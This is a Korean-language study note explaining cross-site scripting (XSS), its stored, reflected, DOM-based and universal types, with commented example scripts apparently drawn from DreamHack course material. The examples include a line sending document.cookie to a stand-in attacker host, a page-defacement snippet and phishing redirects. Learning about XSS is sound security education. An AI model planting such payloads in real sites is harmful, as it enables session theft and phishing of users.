Cross Site Scripting(XSS)

XSS는 클라 사이드 취약점 중 하나로, 공격자가 웹 리소스에 악성 스크립트를 삽입해 이용자의 웹 브라우저에 해당 스크립트를 실행하고, 사이트 이용자가 해당 페이지에 접속하면 악성 스크립트를 실행하여 계정의 세션 정보를 탈취해 임의의 기능을 수행할 수 있다.

XSS 공격은 이용자가 삽입한 내용을 출력하는 기능에서 발생한다(예로 들어 로그인 한 후 아이디가 출력되는 등)

클라는 웹 서버에 리소스를 요청하고 서버로부터 받은 응답(HTML, CSS< JS)등의 웹 리소스를 시각화하여 보여주는데, 이 때 HTML, CSS, JS와 같은 코드가 포함된 게시물을 조회할 경우 이용자는 변조된 페이지를 보거나 스크립트가 실행될 수 있다.

 

XSS 종류

Stored XSS: 악성 스크립트가 서버에 저장되고 서버의 응답에 담겨오는 XSS
Reflected XSS: 악성스크립트가 URL에 삽입되고 서버의 응답에 담겨오는 XSS

DOM-based XSS: 악성 스크립트가 URL Fragment에 삽입되는 XSS(Fragment는 서버 응답/요청에 포함 X)

Universal XSS: 클라의 브라우저 혹은 브라우저의 플러그인에서 발생하는 취약점으로 SOP 정책을 우회하는 XSS

 

Javascript는 웹 문서의 동작을 정의하므로 세션 및 쿠키가 저장된 브라우저에서 웹 페이지를 조작하거나 주소를 변경할 수 있으므로 XSS에서 많이 활용된다. 다음과 같은 script를 보자

쿠키 탈취 코드

<script> //<script> 태그를 사용하여 자바스크립트를 실행한다
alert("hello"); // 화면 알림으로 hello가 뜬다
document.cookie; 
alert(document.cookie) //Cookie를 출력
document.cookie = "name=test;"; // key=name, value=test인 Cookie 생성
new Image().src = "http://hacker.dreamhack.io/?cookie=" + document.cookie; // 이미지의 주소를 지정, 공격자 주소도 정할 수 있다
</script>

 

페이지 변조 공격 코드

<script>
document; // 이용자의 페이지 정보에 접근.
document.write("Hacked By DreamHack !"); // 이용자의 페이지에 데이터를 삽입.
</script>

위치 이동 공격 코드

<script>
location.href = "http://hacker.dreamhack.io/phishing"; // 피싱 공격에 사용되는 이용자 위치 변경
window.open("http://hacker.dreamhack.io/") // 새 창 열기
</script>

 

Stored XSS

Stored XSS는 서버의 DB 또는 파일 형태로 저장된 악성 스크립트를 조회할 때 발생하는 XSS다. 대표적으로 게시물과 댓글에 악성 스크립트를 포함해 업로드하는 방식이 있다. 

 

Reflected XSS

서버가 악성 스크립트가 담긴 요청을 출력할 때 발생한다. 대표적으로 게시판 서비스에서 작성된 게시물을 조회하기 위한 검색창에서 스크립트를 포함해 검색하는 방식이 있다. 이용자가 게시물을 검색하면 서버에서는 검색 결과를 이용자에게 반환하고, 일부 서비스에서는 검색 결과를 응답에 포함하는데, 검색 문자열에 악성 스크립트가 포함되어 있다면 Reflected XSS가 발생할 수 있다.

Reflected XSS는 URL처럼 이용자의 요청에 의해 발생한다. 공격을 위해서는 다른 이용자를 악성스크립트가 포함된 링크에 접속하도록 유도해야 한다. 그러나 링크를 직접 전달하는 방법은 악성 스크립트 포함 여부를 이용자가 알아챌 수 있기 때문에 Click Jacking 또는 Open Redirect 등 다른 취약점과 연계하여 사용한다.